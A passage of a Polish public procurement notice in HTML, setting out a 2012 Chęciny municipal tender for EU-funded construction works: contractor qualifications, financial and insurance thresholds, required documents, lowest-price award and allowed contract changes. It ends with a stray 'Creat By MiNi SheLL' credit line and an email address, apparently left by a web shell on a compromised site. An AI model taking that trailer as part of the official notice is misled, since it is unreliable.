-    Jeżeli wartości robót w wykazie zostaną podane w walutach innych niż PLN, Zamawiający dla sprawdzenia spełnienia warunku, przyjmie średni kurs PLN do tej waluty podawany przez NBP na dzień opublikowania ogłoszenia o zamówieniu.
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów:
-	wykazu robót budowlanych (wg wzoru załącznik nr 5 do specyfikacji) w zakresie niezbędnym do wykazania spełnienia warunku doświadczenia oraz
-	dokumentów potwierdzających, że wykazane roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,
wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia.    Wykonawcy muszą wykazać dysponowanie osobami zdolnymi do wykonania zamówienia, przez co rozumie się dysponowanie co najmniej:
-	1 osobą do pełnienia funkcji Kierownika Budowy, posiadającą: uprawnienia budowla-ne w specjalności konstrukcyjno-budowlanej bez ograniczeń, aktualną na dzień skła-dania ofert przynależność do właściwej izby samorządu zawodowego; co najmniej 5-letnie łączne doświadczenie na stanowisku kierownika budowy w tym co najmniej kierowanie 1 robotą budowlaną o kubaturze nie mniejszej niż 4 600,00 m3 ;
-	1 osobą do pełnienia funkcji Kierownika robót elektrycznych, posiadającą: uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, aktualną na dzień składania ofert przynależność do właściwej izby samorządu zawodowego;
-	1 osobą do pełnienia funkcji Kierownika robót sanitarnych, posiadającą: uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych; aktualną na dzień składania ofert przynależność do właściwej izby samorządu zawodowego;
-	1 osobą do pełnienia funkcji Kierownika robót drogowych, posiadającą: uprawnienia budowlane w specjalności w drogowej, aktualną na dzień składania ofert przynależność do właściwej izby samorządu zawodowego;
Ocena spełnienia w/w warunków nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów:
-	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia (wg wzoru nr 6 do specyfikacji) w szczególności odpowiedzialnych za kierowanie robotami,
-	oświadczenia, że osoby te posiadają wymagane uprawnienia, (wg wzoru nr 7 do specyfikacji),
wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Wykonawcy muszą wykazać, że:
-	dysponują środkami lub posiadają zdolność kredytową w kwocie minimum 2 000 000 zł;
-	posiadają polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości sumy ubezpieczenia nie mniejszej niż 4 000 000 zł.
UWAGA
Jeżeli wartości zostaną podane w walutach innych niż PLN, Zamawiający dla sprawdzenia spełnienia warunku, przyjmie średni kurs PLN do tej waluty podawany przez NBP na dzień opublikowania ogłoszenia o zamówieniu.
Ocena spełnienia w/w warunków nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów:
-	informacji z banku
-	opłaconej polisy ubezpieczenia. 
wg formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy stanowiący Załącznik nr 2 do specyfikacji.
   Zmiana umowy może nastąpić w zakresie:
1)	zmiany sposobu świadczenia, na skutek następujących okoliczności:
a)	niedostępnością na rynku materiałów lub urządzeń, wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,
b)	koniecznością zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/ technologicznych, niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
c)	koniecznością usunięcia wad w dokumentacji,
d)	koniecznością realizacji postulatów osób trzecich nieuwzględnionych na etapie podpisania umowy, a ze względów społecznych koniecznych do spełnienia, powodujących zmiany w projekcie.
e)	wykonaniem robót zamiennych w stosunku do rozwiązań przewidzianych w projekcie, skutkujących zwiększeniem bezpieczeństwa obiektu, podniesieniem funkcjonalności obiektu i efektywności rozwiązań projektowych, jeżeli rozwiązania zamienne nie odstępują w sposób istotny od zatwierdzonego projektu.
Dokonując zmiany sposobu świadczenia, strony wyodrębnią:
-   roboty zamienne,  tj.  roboty,     które Wykonawca wykona w  zamian robót zawartych w pierwotnej dokumentacji projektowej,
-   roboty   zaniechane   przez   które   rozumie   się   roboty   objęte   pierwotną   dokumentacją projektową, a których wykonanie stało się zbędne. 
2)	zmiany wynagrodzenia ryczałtowego w przypadku istotnej zmiany sposobu świadczenia Wykonawcy, o którym mowa w pkt.1) stwierdzonej aneksem do umowy;
a)	Podstawą określenia wynagrodzenia za roboty zamienne będzie protokół konieczności
uzgodniony przez Strony oraz kosztorys różnicowy sporządzony przez Wykonawcę metodą szczegółową, przy czym w przypadku wykonywania robót według nowej technologii cena robót zostanie obliczona w sposób określony poniżej:
-	stawka r-g, wskaźnik kosztów pośrednich i zysku - będą tożsame z wielkością tych składników cenowych zawartych w kosztorysie ofertowym,
-	ceny materiałów i sprzętu - według średnich cen opublikowanych w kwartalnej Informacji cenowej o cenach materiałów budowlanych, elektrycznych i instalacyjnych i pracy sprzętu SEKOCENBUD, obowiązujących w chwili opracowania oferty i zawierających ceny zakupu dla materiałów, a w przypadku ich braku według cen udokumentowanych i uzgodnionych z Zamawiającym.
Tak sporządzony kosztorys różnicowy po uprzednim jego sprawdzeniu i zatwierdzeniu przez Zamawiającego, będzie stanowił podstawę zmiany wynagrodzenia Wykonawcy.
b)	Podstawą określenia wynagrodzenia za roboty zaniechane będzie protokół konieczności
uzgodniony przez Strony oraz kosztorys sporządzony przez Wykonawcę metodą szczegó-łową, tj. określający ilość jednostek przedmiarowych zakresu robót podlegających zanie-chaniu pomnożonych przez ceny jednostkowe wynikające z kosztorysu ofertowego. Tak sporządzony kosztorys po uprzednim jego sprawdzeniu i zatwierdzeniu przez Zamawiającego, będzie stanowił podstawę zmiany wynagrodzenia Wykonawcy. Wartość robót zaniechanych skutkuje odpowiednim zmniejsze?niem wynagrodzenia Wykonawcy.
UWAGA
W przypadku ustawowej zmiany stawki podatku VAT zmiana wynagrodzenia ryczałto-wego nie jest dopuszczalna, z zastrzeżeniem rozliczeń z Wykonawcą, którego oferta prowadzi do powstania obowiązku podatkowego w VAT po stronie Zamawiającego
3)		zmiany terminu wykonania przedmiotu umowy w przypadku:
a)	pisemnego żądania wstrzymania prac skierowanego do Wykonawcy przez Zamawiającego lub wydania zakazu prowadzenia prac przez organ administracji publicznej, o ile żądanie lub wydanie zakazów nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność(np. dokonanie odkrywki archeologicznej, odkrycie niewybuchu),
b)	nie przekazania przez Zamawiającego w terminie wynikającym z ust. 1 placu budowy,
c)	wystąpienia niekorzystnych warunków atmosferycznych odbiegających od typowych, a uniemożliwiających prowadzenie robót budowlanych, przeprowadzenie prób, sprawdzeń, dokonywanie odbiorów,
d)	wystąpienia okoliczności siły wyższej, jako zdarzenia niezależnego od żadnej ze stron, które nastąpiło po wejściu w życie umowy a którego strony nie były w stanie przewidzieć w momencie zawierania i którego zaistnienie lub skutki uniemożliwiają wykonanie niniejszej umowy zgodnie z jej treścią; strona powołująca się na okoliczności siły wyższej jest zobowiązana do niezwłocznego pisemnego powiadomienia drugiej strony, a następnie udokumentowania zaistnienia tego stanu,
e)	istotnej zmiany zakresu świadczenia Wykonawcy stwierdzonej aneksem do umowy, która będzie miała wpływ na zmianę terminu zakończenia wykonania przedmiotu umowy, wynikającej z wad zawartych w dostarczonej przez Zamawiającego dokumentacji projektowej wraz ze specyfikacją techniczną wykonania i odbioru robót, albo zajścia innych okoliczności, niezależnych od Wykonawcy, które mogą przeszkodzić prawidłowemu wykonaniu robót, z tym, że Wykonawca zobowiązany jest do niezwłocznego poinformowania Zamawiającego o wystąpieniu przypadków, o których mowa w niniejszym ustępie, a także udokumentowania zaistnienia tych przypadków;
f)	jeżeli Wykonawca zamierza wykonać przedmiot zamówienia wcześniej niż w uzgodnionym z Zamawiającym pożądanym terminie wykonania zamówienia, jest zobowiązany złożyć do akceptacji Zamawiającego nowy harmonogram rzeczowo-finansowy robót uwzględniający skrócony termin zakończenia przedmiotu zamówienia.
3.      Zmiana umowy może zostać dokonana wyłącznie w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.checiny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2012 godzina 10:00, miejsce: w siedzibie Zamawiającego pokój nr 109 - Sekretariat Urzędu Gminy i Miasta Chęciny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt w ramach PROW 2007-2013 działanie 413 Wdrażanie lokalnych strategii rozwoju w zakresie operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com